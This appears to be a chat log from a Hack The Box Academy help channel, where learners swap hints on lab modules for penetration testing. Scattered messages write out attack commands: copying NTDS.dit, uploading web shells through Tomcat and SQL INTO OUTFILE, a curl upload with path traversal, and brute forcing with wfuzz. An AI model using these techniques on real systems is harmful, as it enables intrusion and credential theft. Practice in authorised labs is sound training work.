#modules
In Password Attacks / AD, the following command is listed: || *Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit ||. Looks to me like it's simply overwriting the original file rather than putting it elsewhere before exfiltration?
This command copies the NTDS.dit file (which contains the Active Directory database) from a Volume Shadow Copy snapshot to the "NTDS" folder on the C: drive.
That's what I thought; it's just that that path is standard, as is explained in the same section, so I'm not sure what the point would be.
Anyone else experiencing issues with the machine for the Virtual Hosts section of the Information Gathering module? One minute the machine works, the next it doesn't even respond to a curl request.
Shells & Payloads >> Anatomy Of A Shell >>. In Pwnbox, issue the $PSVersionTable variable using PowerShell. Submit the edition of PowerShell that is running as the answer. I give the correct answer and am told that it is wrong. Can I get some help?
Are you sure you entered the edition and not the version?
I'm confused... In the Windows Security section in the Windows Fundamentals module they say to find the user SID using Get-WmiObject, but up to this point I don't recall (and I looked through my notes too) any such cmdlet that includes the SID of users other than the one already logged in. I tried runas but it requires the password of the user.
I’m an idiot lol, thanks!
no problem, i did the same thing lol
Well, it's there, but I'm not sure how to explain it without downright spoiling the solution.
point me to the section
Wait.. they mean the SID from the page itself?
that sounds like cheating..
ok good, it isn't it
No, it's not displayed on the page. I've searched Microsoft's KB but can't find the argument for some reason, and I wasn't keeping notes back when I did that module.
is the command in the module?
it's in the hint
? Get-WmiObject isn't really helpful if I don't know what object to query
there are tons
if you google ||get-wmiobject sid|| you'll find something useful on ||likely the first result, on tenforums||
Ok so it isn't in the module... that's kinda mean after all that info dump
thanks n4p ❤️
Can anyone help me solve this question --- Find a way to start a simple HTTP server inside Pwnbox or your local VM using "php". Submit the command that starts the web server on the localhost (127.0.0.1) on port 8080.
Ok so I can see the answer... ||nordVPN|| for the second question, but how do I know it's disabled on startup? Do I really need to go to ||Task Manager||? Is there a way to check that from the command line?
No problem. It happens sometimes that you need to find some info outside the modules. Also, I just noticed that you can do something like ||get-wmiobject -list | select-string user|| to look for classes related to users. I wish I could remember what my thought process was when I solved it but I'm drawing complete blanks.
Not sure about the command line. I believe I just had a look at what's in the start menu that's not running, but you can also open ||"startup apps" in the start menu|| and have a look.
Hi everyone, hope you are well
Quick question: I just finished the Getting Started module and "hacked" the box at the end of the module.
My problem is that I was working on the HTB workstation and lost the connection after submitting the root flag.
I didn't have the time to export the information. Do you know if I can find the walkthrough somewhere?
Thanks in advance for your response
Could someone help me with the Password Attacks Hard Lab? I tried brute forcing Johanna's password, but cannot get anything. I used mut.lists from the resources.
If the workstation was terminated before you saved any notes you wanted to keep elsewhere, I'm afraid it's gone.
I'm on the third question of the skills assessment for Pivoting, Tunneling and Port Forwarding. I've tried several things to either get a meterpreter reverse tcp shell or to try and get the ssh password and move forward with enumerating the network. So far, nothing has worked. Can someone give me a hint as to how to move forward?
DM if you need
Will do. Thank you!
Hi! I am stuck in the HTB Academy Live Engagement module.
Need a little help in exploiting HOST 1.
curl -v -u tomcat:XXXXXX -T /usr/share/webshells/laudanum/jsp/cmd.war 'http://172.16.1.11:8080/manager/text/deploy?path=cmd.war&update=true'
but it says unauthorized to upload
By logging in to the manager through the GUI the credentials work
Now thinking that there must be something wrong
Need a direction
I might be able to help. DM
found the way. ❤️
First time in Hack The Box and no experience! Could someone tell me how to use OpenVPN? I've already downloaded the files; unfortunately, when I open Kali Linux, the files are not able to be dragged over. How can I figure it out?
@desert lark use sudo openvpn file name
$ sudo openvpn <FILENAME>
I GOT IT! first time try~
niceee
In Active Directory Living Off the Land... the last question, I am not understanding how to set up my dsquery and LDAP filter. Can anyone help me out? "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer"
Hi, I am doing the Getting Started fundamentals and on the gobuster module, I am running the VPN, and when I try to use gobuster and the IP address that I was given, I am getting a timeout error. Can someone please give me some pointers?
Hi, anyone who can help me with the Tomcat manager upload issue I am facing in Shells & Payloads - The Live Engagement - Host #1?
Hey, I got stuck on Q7 from the AD Enumeration Module Skills Assessment II. I got a reverse shell with the user, but how can I get additional info from here? Any hints? Thank you 🥲
So you have a shell on SQL01 right now?
Hey, thanks for replying! Yes I have, but I can't upload any files like mimikatz. I'm trying to do something with net commands, but no success 😦
Hmm, how did you get the shell?
Well, basically with xp_cmdshell I just uploaded a .ps1 reverse shell file and executed it.
ahh ok, you need to work on getting a more stable shell at this point. See if you can figure out how to get a stable shell back to your attack machine
Oh okay, thank you! Can I DM you if I can't solve it in few hours? haha my boss wants me to clear this path in a week so I'm quite in rush 😦
Yeah no problem
Thanks dude, but first I'll try my best to figure it myself 🙂
I might have misunderstood; if you already ran a ps1 shell from xp_cmdshell back to your attack machine, then look for a way to escalate your privileges. Anyway, feel free to DM me.
Module: Linux Privilege Escalation
Section: Wildcard Abuse
I'm reasonably comfortable with cronjobs. But what does NOT make sense is how the escalation vector is supposed to work if that command is executed from within the root folder? I've tried this on my VM with no success. I'm sure I'm doing something wrong. Can anyone explain this?
Hi, I could have sworn I was doing this last exercise right for PowerShell in the Windows Command Line module.
Who works with SQL?
I must be stupid! In the Introduction to Academy, the very first question: What is the name of the first section of this module? I have tried till I'm blue; can someone point me in the right direction? I am new to the PC stuff so please go easy on me. Thanks
Hi guys, I am trying to do an nmap scan on an IP address, and I am connected to the VPN, but when I try nmap, it says the host is down. Any tips/suggestions?
Answer this "what is a section" and you'll have your answer
Hi guys, I put user10, user10@greenhorn.corp, etc in for the answer to the Windows Command Line Module's final question. Can you please help me figure this out? I tried this tutorial but for Event 4625
Ping, try different tools. Maybe it's a public IP that requires curl/whatweb/Firefox to interact
ahh ok
tutorial:
https://4sysops.com/archives/find-the-source-of-account-lockouts-in-ad/
It's for finding the user account on the domain controller with Event ID 4625.
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? Flag is the name of the user account.
could someone help me out?
I know Advapi is not the answer
could someone help me out?
I don't get it
When I am trying to exploit a target and it says that the target is not exploitable, does that mean that the exploit I am trying to use won't work, or that the method I am trying to use should be different?
it looks like (from other discussions) that due to some security patch (possibly), it only works with a separate CA that is not a DC. Perhaps the lab should be updated, as without a certificate we cannot proceed with the following sections of the module
Maybe I should ask a better question: when I search searchsploit for an exploit and a ton of different exploits show up, can I just choose any one of them, or is there some way I should know which one to pick?
Generally, to narrow down the choices you should be clarifying the version number.
So I would say searchsploit "name" "version"?
Yes
What's the module you're doing?
fundamentals of hacking attack public exploits
Ah then I would definitely make sure you keep it Simple ;)
If I use searchsploit and the name with file, I get results, but I am not really sure how to use the exploits.
Definitely read the module carefully
ok
When I get home later I may be able to provide better hints if you still don't have it.
that would be greatly appreciated
I am doing Password Attacks Lab - Hard and I found valid creds and logged into RDP and evil-winrm, but I can't progress any further.
Can I DM someone?
The hard lab, iirc, is all about back-and-forth exfil of data and cracking.
I have tried dumping SAM/LSASS, but couldn't.
There is ***.kdbx but I don't know what to do with it.
^ there are a few files in that lab that are rather interesting, and in some cases might need exfiltration.
One of those is a password manager. Perhaps that matches the .kdbx format.
There is a k*2john as your other hint
I have found a fat passwords file, but I can't do anything with it (**/1/password.txt)
thanks for everything!
When you open the terminal, what does it look like?
Hint: it's a character
Iirc
Kinda like a Windows home
Terminal = command line
Ywyw
Sorry, idk anything abt stuff like this at all
Also welcome to hacking
Nah you're good
The only time any of the active people will be really pedantic/sassy is when someone is showing a clear lack of reading comprehension
Not at home
screenshot
If you're using pwnbox it's the green box
You do need to be using a Linux VM or pwnbox
Hint though: look carefully at the command line iirc
omg ok I did it
it was called like MATE terminal and not bash terminal 😭
thank you
MATE is the terminal; bash is the actual command line interpreter.
oh okay thank you
I just thought the website looked cool; as you can tell I'm going into this with absolutely no idea what I'm doing
thanks for your help and patience :)
Hi guys, a few months ago I tried to do the finding files and directories section of Windows Command Line Module. I asked for help when the file Waldo.txt, containing the flag, could not be found. The HTB Academy community said I should come back to it later so I completed other modules as well as the rest of windows cmd line module later on, and after I did that I got back to this module finding files and directories. I will look again for Waldo.txt but I don’t want to waste my time because the HTB Academy community said the flag is not stored on that server and that the HTB Academy devs made a mistake when writing that section initially. Should I try this module again or should I just get the flag online or something? In other words, has the exercise been fixed yet?
And if not, how am I supposed to get the flag if the file is not there?
I did this module about 3 weeks ago; I found the file and submitted a flag.
Ok thanks. In that case I will try again later tonight.
So I'm looking for the proper NSE script in the Nmap module
I'm having trouble with what port or what script
I've tried both --banner and -vuln on both 31337 and 80
DM if you're still stuck
Hello all…having a hell of a time with the command injection skills assessment. I’ve found the injection point, and can tell I’m close since I’m getting the ‘Malicious request denied!’ message….but can’t seem to get anywhere. I’ve literally tried every injection operator…as well as o’bfus’ca’ti’on if you know what I mean….but no dice. Any nudges?
@mystic light had some random luck picking the right script in the NSE but thanks!
Active Directory Enumeration & Attacks <<< this module is like 100 miles long. sheesh 😄
Ladies and gentlemen, I am proud to say I found the solution.
To any that may have trouble with this skills assessment….remember that this calls for advanced command obfuscation…and when looking for an injection point….check EVERYWHERE on the page…this website allows you to do some interesting things 😉
Because that's the custom version but not the actual version; do an nmap scan and check for the version to get it.
that answers a different question in that section
Hello. I'm working through the Live Engagement for the Shells and Payloads module and can't figure out how to access Host 1. It seems like there should be a web browser or something on the footprinting machine but I can't seem to find one installed. Can someone help out?
firefox in the command line
Ahh, thank you... feeling a bit dumb over here
Eh, if you haven't really run Firefox from your VM's terminal before you don't immediately think about it
Also, for the SMB section you will use pretty much each of the tools discussed
Hello, has anyone solved the Skills Assessment - Service Login? I'm stuck trying to guess credentials. I am using cupp and only setting name, surname and birthday, also pet name, but nothing. Should I use other data to generate passwords? For the user I am trying with username-anarchy.
I'm on the Pivoting, Tunneling and Port Forwarding skills assessment and I'm having a problem with the 4th question. I can get chisel to work up to the point where you're supposed to RDP into the live host that you found on the adjacent network with the username and password you found. However, I'm getting a very strange error of "Failed at index 1 [v:ip address of the pivot target]: Invalid sigil". Has anyone seen that before or know how to resolve it?
I've tried using an ssh tunnel instead, but that fails without the password for the linux host, which I don't have.
proxychains xfreerdp /v:ip address of pivot target /u:username /p:password
Thank you!
What should it be then?
I copied and pasted it directly from the 3rd answer and I still get the same error. Could it be that my config file might be incorrect?
add proxy here ...
socks4 127.0.0.1 9050
socks5 127.0.0.1 1080 (is how my config file looks)
Wow, that copied and pasted strangely.
LOL!
In the Attacking Common Applications Module, there are some new sections that were recently added. Has anyone done the Attacking Thick Client Applications section? I finished it but it won't take my answer, so I was hoping I could verify my findings with someone else who has completed that section. https://academy.hackthebox.com/module/113/section/2139
iirc there have been some issues with that section; might need to message support directly on the site.
Would I just do that in the erratum channel?
ok thanks! will do
if you don't see it: Disable ad-block; disable any vpn you may be using
👍
yuck, I had to use my Windows machine with Edge to get to it, thanks for the tip!
Oof; also, to get credit just provide the PoC/attack chain you used to get what you assume is the correct answer and they'll be able to sort it out for you.
Can you help me?
Why don't you ask your question here to see if someone can help you, instead of replying randomly to someone whose message was a few weeks to a month ago?
I finished the Log Poisoning section of the FILE INCLUSION module. If anyone has any questions, maybe I can help with something. I had some trouble doing it, which is why I offer my help.
Can anyone help me find the answer to ----- What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)
I am stuck on what to do for the Nmap module, hard lab challenge
Would love some help
The hint is cryptic as hell and I've been at it for a few hours (really just waiting for the -sS -D scan to finish, no avail)
Got it, so lame. Really bad hint HTB.
I didn't even discover it myself.
Hello
hi
I have finished these modules, if anyone needs help I can explain a little.
I need some help with the Nmap module, the whole IDS thing; I can't seem to see how to stop the IDS
You don't stop it, you circumvent it
@rustic sage yeh I get that, but so far I've done spoofing the IPs and redirecting the ports as well as fragmenting the packets
which lab?
hard lab
welcome to the club
It's a shit lab in that module
I spent 4-5 hours on it
Bad hints, bad explanation
Try netcatting to port 50k like it did in the primer
I netcatted a bunch of ports already, but not 50k yet
Must say that's a random one
Because it doesn't enumerate
HTB needs to fix it
My scan took 3 and a half hours and didn't detect it
kk I'll give it a go then
@rustic sage got it, so do you think there's any difference between ncat and nc?
they are different
ncat is basically an extension of functionality
It's "modern"
The syntax is compatible
@rustic sage so ncat is better, would you say then?
yes
What exactly did not work? The path was discussed almost 1:1 in the module. Right?
Bashing my head against a wall for the Broken Authentication module brute force attack against htbuser. You have to identify the password policy, which I have... but keep getting too many login failures. Have added X-Forwarded-For but no joy. This module is the least fun 😦 Any tips?
wfuzz -b "PHPSESSID=bcpma2pk6deoig3h587itscvt8" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" -H "X-Forwarded-For: 127.0.0.1" -c -w output.txt -d "userid=htbuser&passwd=FUZZ&submit=submit" --hs "Invalid credentials." http://139.59.181.223:31707/
Sure, that's where I copied the command from, verbatim. But the port was not revealed in a manner that was congruent with the lab context or hint; it was utter garbage.
The goal of the modules is not that you copy and apply the commands 1:1, but that you understand the way and can apply it afterwards.
So if you understood the way, it should be possible without problems to detect another port and adjust your payload accordingly.
My guy, I even resorted to ChatGPT to help with the payload
Me and another had the same issue
This one's on HTB
I don’t recall having any issues with it. But sadly didn’t record any notes on it.
Nmap, hard lab 3. We both used fragmentation, decoys, SYN scan, etc.
Port didn't show at all, not even filtered
I got the flag on a fluke, guessing
I remember finding medium being harder
Medium and easy took me 5 minutes each
Hard is poorly presented
It consumed 5 hours of my day doing painstaking scans
So have you actually understood why the guess worked?
DM
Not at all
For the second question on the Dynamic Port Forwarding lesson, when I attempt to enable dynamic port forwarding with ssh, I log in as the ubuntu user instead. Any hints on what could be the issue? Here is my command: ssh -D 9050 ubuntu@10.129.49.53
Hey, I'm sorry, I can't find which channel they talk about the Pro Labs in; how do I find this?
Ty
Can anyone explain to me why this query is not working for this question: In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?
My query: ||SELECT * FROM titles WHERE emp_no > 10000 OR title NOT LIKE '%Engineer%';||
Which question are you talking about?
This command does the forwarding and logs you in as the user. I believe there is a flag to prevent the login shell but either way, the forward should work
I believe 'Engineer' has to be 'engineer'
I just figured it out. I didn't know I had to keep the connection with the target open for the proxy to work.
The flag to prevent a login shell should be -N iirc
Would anyone be able to provide some guidance?
Module: HTTPS/TLS Attacks
Chapter: POODLE & BEAST
Question: Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.
I'm just a little bit lost on what the actual question is wanting you to do. I've tried following the examples, but I'm not getting the vulnerable and not-vulnerable responses. Is there a specific host I'm meant to be testing against?
Thanks for the response.
You're welcome 🙂
Try limiting the number of concurrent connections and delaying the time between each request.
I finished the FILE INCLUSION module, so if anyone has any doubts, maybe I can help.
yes got it
Anyone able to help me with SQL injection with comments? I'm trying to figure out how it works
sure dm me
anyone able to help me with this question? We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.
nvm got it
Hi, can an admin or moderator please DM me
Why do you need to be DMed?
Nevermind, solved it. I didn't realise you just need to manually write out the padding. (- -)
Hello guys, I didn't know where to ask this but here I am
So if I'm brute forcing an SSH port and the brute force attack is a success, would I have to be on the same network as the server to gain root access to it?
@fathom pendant
24 seconds
Observe the web application based at subdirectory /question1/ and infer rate limiting. What is the wait time imposed after an attacker hits the limit? (round to a 10-second timeframe, e.g., 10 or 20)
So round up to 30
I haven't done the module ¯\_(ツ)_/¯
It shouldn't be guess-based; you should have enough clues within the module and section to get you the answer
Module Attacking Common Services - Lab Easy
Hello, I have been able to enumerate the host and get to the file upload part.
Ty in advance
Supposedly I have been able to upload a PHP shell, the simple one where you supply the "cmd=<command>" part in the URL.
But I haven't been able to launch it. I also tried to upload the wwwolf PHP shell and launch it, but to no avail.
here are the commands I used
file upload
||curl -k -X PUT -H "Host: 10.129.99.210" --basic -u <user>:<password> -F 'fileX=@/home/user/shell.php' 'https://10.129.99.210/../../../../../..\xampp\htdocs\myshell.php' ||
But when it comes to running them I'm uncertain tbh
I have tried the URL method where I supply the cmd param at the end (?cmd="whoami")
I have also tried invoking a rev shell with curl, but it keeps giving me a (No Header Colon Error)
||curl -k -X GET -H "HOST: localhost" -u <user>:<pass> 'https://10.129.99.210/shell.php?cmd="whoami"' ||
And the upload command gave me a 200 response code
I have been able to access the files on the server originally; other than that it won't work
Hi there, can anyone nudge me on Q6 AD Enumeration Module Skills Assessment II? It's kicking my ass
Trying to finish up the Live Engagement part of the Shells and Payloads module. Have tried running the EternalBlue Metasploit module on Host 3 but can't seem to get a shell (Exploit completed, but no session was created). Can anyone help me out?
change up the exploit, there are multiple variations for the exploit, there is a particular one used throughout the explanation in the module
So I'm new to this thing. Where should I start?
https://www.hackthebox.com/blog/learn-to-hack-beginners-bible give this a read
I'm officially stuck. I uploaded the shell using MySQL, but I haven't been able to run it, and when I try to load it with MySQL to view its contents, it gives me NULL.
The curl command I use to try to invoke the shell:
||curl -k -u <user>:<pass> "https://10.129.203.7/webshell.php" ||
and the SQL commands
||SELECT "<?php echo shell_exec($_GET['whoami']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php'||
||select load_file("C:\xampp\htdocs\webshell.php");||
if anyone could lend a hand, please do
From my notes, you don't need the ||select Load_file||. Also, you should use ||double slashes. As in "C:\\xampp"||. Then you should just be able to query via the webshell with ||the command you need to access the file||.
Wait, I did the first two notes, but the last one, that's where I'm lost
The ||select load_file|| I used to check if my files are uploaded correctly or not; I used the ||double slashes|| when I noticed that the file names are messed up, but I still can't access the file xD
You're using load_file to try and execute the webshell?
Hello, has anyone solved the Skills Assessment - Service Login? I'm stuck trying to guess credentials. I am using cupp and only setting name, surname and birthday, also pet name, but nothing. Should I use other data to generate passwords? For the user I am trying with username-anarchy.
I figured it out; I had to encode the commands some way to get them to work
🤘
Well, afaik the question suggests using UsernameGenerator, which is another tool. Not sure if username-anarchy generates the right one too.
If that doesn't work either, dm me and I'll take a closer look
dm me if you're still stuck
Hey guys, quick question for the Nibbles box module in Getting Started: for my privesc from the normal user nibble, the only way I could get root through my reverse shell was having to specify the full path of where the shell script was that the user had root permission to run, as opposed to just doing ./script.sh. Why is that?
e.g. sudo /home/user/nibble/script.sh as opposed to sudo script.sh
Just one of those weird things with sudo iirc
Is it bad I just used SOCKS and proxychains for the payloads assessment because the foothold box annoyed me?
There's many ways to skin a squirrel
Hello
Hello, I need some help on the Windows Priv Esc Pillaging last question "Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer". I restored all 3 but there is nothing containing SAM or SYSTEM
Hi! I am trying to complete "Using Web Proxies" and I am stuck on the ZAP fuzzer lab. I am fuzzing the cookie with the MD5 hash of the usernames in the file "top-usernames-shortlist.txt" but I am still unable to find the flag. Can someone point out what I am doing wrong please?
I'm working on Kerberoasting - from Linux and I'm stuck on the question "What powerful local group on the Domain Controller is the SAPService user a member of?"
Here is a screenshot of the thing I am trying to do.
It tells you when you run the command you would have run to solve question #1 in that chapter.
For Password Attacks > Credential Hunting in Linux, does anyone know the intended way without using the hint?
It feels like the hint is almost required
In the Attacking Common Applications module, Exploiting Web Vulnerabilities in Thick-Client Applications section, I am wondering if there is anyone who can help me? I got as far as the part where I should be able to use the .jar file to download fatty-server.jar to the desktop. When I try this nothing downloads, and the .jar file I am running tries to open the fatty-server.jar inside the traverse.jar app. There is a part where it has me edit Invoker.java then rebuild the jar. I am guessing this is where I messed something up (either editing or building the jar). Anyway, I was hoping someone could shed some light on it. Thanks!
I don't recall what the hint was. I don't believe I used it. It's very much just riffing off of the example. Took me a while to understand it, but makes sense when it clicks what you're trying to do.
I’m almost at the same point as you; mine won’t even open after editing Invoker.java…
My suggestion to you both would be to not mess with the invoker.java. Instead ||look at the later part of the chapter text. There's another java file that they modify in their example.||
🤦♂️ yup, right there in front of me... Thank you!! I'll try this in a bit when I have time.
It had me going down the rabbit hole as well. 😉
There is a part right before SQL injection where it tells me to modify it; that is why I went that route: "We can modify the open function in fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java to download the file fatty-server.jar as follows."

```java
import java.io.FileOutputStream;
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
    String methodName = (new Object() { }).getClass().getEnclosingMethod().getName();
    logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
    if (AccessCheck.checkAccess(methodName, this.user)) {
        return "Error: Method '" + methodName + "' is not allowed for this user account";
    }
    this.action = new ActionMessage(this.sessionID, "open");
    this.action.addArgument(foldername);
    this.action.addArgument(filename);
    sendAndRecv();
    FileOutputStream fos;
    // backslashes in a Java string literal must be escaped as "\\"
    String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
    fos = new FileOutputStream(desktopPath);
    if (this.response.hasError()) {
        return "Error: Your action caused an error on the application server!";
    }
    String response = "";
    try {
        response = this.response.getContentAsString();
    } catch (Exception e) {
        response = "Unable to convert byte[] to String. Did you read in a binary file?";
    }
    // write the raw bytes of the server's response (the downloaded jar) to disk
    fos.write(this.response.getContent());
    fos.close();
    return response;
}
<SNIP>
```
Yep, same. I did loads of screwing around before I realised my mistake.
Ok, this is making my head hurt! Going to take a break and try again. Thank you again.
My brain might be too fried right now but where is the mistake ?
Modifying ||the wrong java file.||
There’s something I might be missing? The instructions literally tell you to modify the Invoker.java file.
I’m so confused and exhausted, been trying this for hours. So I fun
So unfun
Hello everyone. Does anyone know where I can ask Linux questions?
It does, but that's an example. Stop focussing on that section, and look at the rest of the text.
Your ultimate goal is to get the IP address. Not to follow the example. 🙂
Seems I can skip that part and follow along with the SQL, I think, right?
I've been working on the Live Engagement portion of the Shells and Payloads module for WAY too long and I am struggling to get a session on Host 3. I've tried all of the EternalBlue Metasploit modules and scanners and for some reason cannot find a way to get a shell. Is there a parameter or option that I could be overlooking when configuring the exploit?
||And the teensy bit before||
any should work, no?
Hi, on the Windows Fundamentals assessment I don't have access to create new users in PowerShell. Is that intentional? Do I really have to go through all the menus?
Hey, anybody help me with the AWS Fortress?
not that I'd remember. I can take another look if necessary
Stuck on AD attack
No clue how to exploit it
Nothing works here
kerbrute not working, no SMB, blah blah blah ☹️
Someone who completed Shells and Payloads, I need help with the browser
Open a terminal and type "firefox", or use the Burp Suite browser
ty
Was using links2 and it is so fucking slow
Done with the section, still very frustrating I guess not for people who know Java. Thanks for the help
Mind if I dm?
Anyone else struggling with the Metasploit modules trying to exploit Host 3 in the Live Engagement section of the Shells and Payloads module? I've tried all of the modules and configuring them with different options and can't seem to grab a shell...
Hello everybody, has anyone completed the Busqueda machine?
This isn't the place to ask for that; read #rules and #welcome. Once you have verified your account there is a #boxes and #1094319042384375920 channel.
I want some hints only
yes and you can ask for hints in those channels
this channel is for hints regarding the modules found at https://academy.hackthebox.com
Metasploit is not allowed for OSCP
not sure if it's allowed for the CPTS
any tools talked about in the modules are allowed in the CPTS
it would be kinda silly if they said "hey here's a tool... but you can't use it"
Still good advice—best to know what a script is doing
Guys, does anyone here speak Portuguese?
Heading to bed. Try tomorrow 🙂
I too have fallen victim to the last question in the footprinting section on DNS... I can't find all the zones... any hints please
thank you, i will try
subdomains of subdomains; make sure your initial subdomain list has all the available x.inlanefreight.htb :)
the second uses a list from SecLists
your answer will be x.y.inlanefreight.htb
thanks I will chew on this
I got it but how do I know that subdomain was a zone vs all the other ones??
just bruteforce/trial and error
You can't do a zone transfer but you can bruteforce it. I can't understand that unless you just do it for all of them, I think that's the point...
i mean yeah
'cause there's 2 ways to go about the bruteforcing: you can individually replace OR create a list and do the bruteforce using the list
I completed the NETWORK ENUMERATION WITH NMAP module, maybe i can help someone who is having issues.
just lurk and wait for someone to ask a question related to it
I don't have much time to read everything, so if anyone needs help, please send me a message.
I mean I don't generally read everything either just the last handful of messages when I first hop on and while I'm just active
but giving the blanket "send me a DM" can be loaded, it definitely doesn't let you filter out people that just refuse to read
Yeah, but many people could search info about any module using the Discord search engine and find helpful messages, including my message
(here's a hint, they generally don't)
Does anyone have any clues to solve Firewall and IDS/IPS Evasion - Hard Lab?
from nmap module
Anyone did the CCT or CREST module and took the exam?
how well does it prepare you?
I wonder if you still need extra things for the exam or if just the module will be enough
hello guys
@rustic gyro you will need to do some prolabs to be confident to take the exam
you took the exam? or the course?
which one?
I don't come to participate in your platform, I'm looking for people to collaborate with my cybersecurity business and my OSCP certifications
I'm the founder of OSC Offensive Security & Consultancy
@rustic gyro You will choose prolab according to your choice
greetings
I want to collaborate with my certifications and the practice of my professionals and the platform
& HackTheBox
which do you recommend if i wanted to take CCT? i am currently a CRT so confident is not a problem. just wanted to know if the material in the prep course will be enough.
@rustic gyro Since I haven't done most of the prolabs I think Dante is good
I'm the founder of this business, OSC Offensive Security & Consultancy
They're like, see my web URL??
the one created by the creator of capture the talent? shaun?
@rustic gyro I don't think that is the person who created Dante
@rustic gyro maybe
but maybe i am wrong
@rustic gyro Just try the Dante prolab you may like it
Can we please keep this channel on topic to academy
Sure, just thinking whether to do that or CPTS
@rustic gyro If you have the experience with the environment you can just do CPTS
thanks
Just solved my first easy lab without any help GG
@quick cloud congratulations 🎊 👏 💐 🥳
Hi, everyone!
Can someone help me with "Intro to Assembly Language" - (Skill Assessment Task 1)?
Should my binary ./loaded_shellcode return either "Segmentation fault" or the decoded shellcode?
I will be thankful for any hint
Hi all. I tried to complete the module Common App Attacks but I'm stuck on Skill Assessment 1. I found the Wxx-xxx/cxx but it is impossible to find something interesting in it. I tried to fuzz multiple extensions but nothing.. If someone can give me a hint it will be very appreciated 🙂
Hello, this is kind of off topic and I don't know where to ask this... But I am planning to buy a new machine (laptop), considering the Intel 12th gen hybrid architecture.
Is there any problem in running VMs on a hybrid architecture?
Should I go for it?
@rustic sage
Read the section IDS/IPS Evasion carefully
Ask in #1024429874246590575
Need some hints on "Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host" for assessment 2 on AD Enum and Attacks. I found the password by dumping the LSA, but I can't seem to get the username for that password
Please remove the image as it is actually a spoiler. (Spoiler tagging doesn't really do much.) But also, are there any other accounts found? Perhaps the actual password itself may be a clue. Think, you're on a Windows device
Hello, in Attacking Common Services Hard, I'm having problems finding the flag (I can't activate xp_cmdshell).
I get a 0 when trying to impersonate John.
Will appreciate hints and nudges please dm
IIRC there is another SQL server you can access through the current one. It's DEFINITELY something I had to do a lot of looking up to get the answer to; I can't remember if it's somewhat gone over or not in the SQL section
But it does require some abstracting
I am still doing Password Attacks Lab - Hard and I reached somefile.vhd
I have bitlocker2john, produced some hashes, but only cracked one of 2 with the same password
and when I try to mount the vhd file with the pass I found, this is what I get
Enter key or passphrase ("/dev/sda2"): guestmount: no operating system was found on this disk
any help?
Active Directory skill assessment #2: + 1 Crack this user's password hash and submit the cleartext password as your answer.
I have gotten the user account name via BloodHound but I'm stuck on how to get his hash; I've tried Kerberoasting and dumping LSASS/SAM but got nothing
OK so I got the password by password spraying but I'm wondering what's the way to get the user's hash
I made it, what do you want to know?
In a chapter they tell you nmap misses stuff and it is better to connect directly to the service to know more, like the version of the software used
AD Skills Assessment 2: I don't get how to get PrintSpoofer on the target system
but how do you get Responder to work if you aren't logged into ct059 to make the request
I just host an HTTP server on the Parrot box and certutil it from the target
Wow just finished AD module, good stuff
hi all
I tried to complete the module Attacking Common Applications but I have been stuck on the
Exploiting Web Vulnerabilities in Thick-Client Applications section for several days..
I get an error when I use the command: javac -cp fatty-client-new.jar fatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java
(error: cannot find symbol (for all classes in the file))
and the new classes are not created so I can't move to the next step... I can't figure out what I'm missing
and I have to say Java and me is clearly not a love story xD
If someone can help me on this it will be very appreciated
thanks all
Am I missing something obvious?
**"Authenticate to 10.129.159.194 with user "htbdbuser" and password "MSSQLAccess01!"**
On the Attacking Common Services >> Attacking SQL Databases section:
- I have attempted to authenticate with mssqlclient.py
- I have attempted to authenticate with sqsh -- both normal and windows-auth
Regardless, both methods fail. I am doing this directly from the HTB-supplied machine. I have restarted the target machine twice.
mssqlclient.py -p 1433 htbdbuser@IP
Worked for me
Sure enough! That did it. Strange that the other syntax doesn't work -- especially the syntax directly from the "cheat sheet" in the course. Maybe just something being odd today. Thanks for your help!
Also sqsh seems to be broken in general
Ah, maybe HTB Academy needs to update that portion then
It's broken specifically for Parrot; Pwnbox is a fork of Parrot
IIRC people had no issues with sqsh on Kali or Ubuntu systems
Oh, that makes sense. Usually I use my own Kali VM for the labs, but have run into issues which require the Pwnbox specifically -- so for this one, it requires NOT using the pwnbox specifically 😂
I mean no labs really require the pwnbox
I've managed pretty fine without it
I only really hop on the pwnbox if I think that what I'm doing should get results but isn't for some reason
#module name: Shells & Payloads
#section name: Reverse Shells
#question: Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.
I'm using a personal VM with a VPN connection. I've set up an nc listener on my attack box. RDP'd into the target box, no issues. When I run any attempt to establish a reverse shell on the target, PowerShell either dumps a list of errors or PowerShell just closes out and no connection is established. I've tried using the PS one-liner that's provided in the lesson (adjusting the IP and port accordingly) and I've tried using one-liners from both PayloadsAllTheThings and revshells.com. Issue persists. Any help would be appreciated.
Edit: Resolved.
I just have one thing to say:
https://academy.hackthebox.com/achievement/badge/5238360d-dd39-11ed-acfc-bea50ffe6cb4
😅
Congrats 🎉
Great job, Congrats !!
Same issue, the module is likely broken and the server ignores every verb it doesn't handle (OPTIONS included)
Hi
any help ?
I couldn't get mounting to work on Linux in any reasonable timeframe. Instead I pulled it off and mounted it on a Windows box.
That's been the general move to do
🤘
I was thinking about that, but I thought it could be possible through Linux
I bet it is, but is the juice worth the squeeze?
It's possible but probably something stupid simple that's overlooked
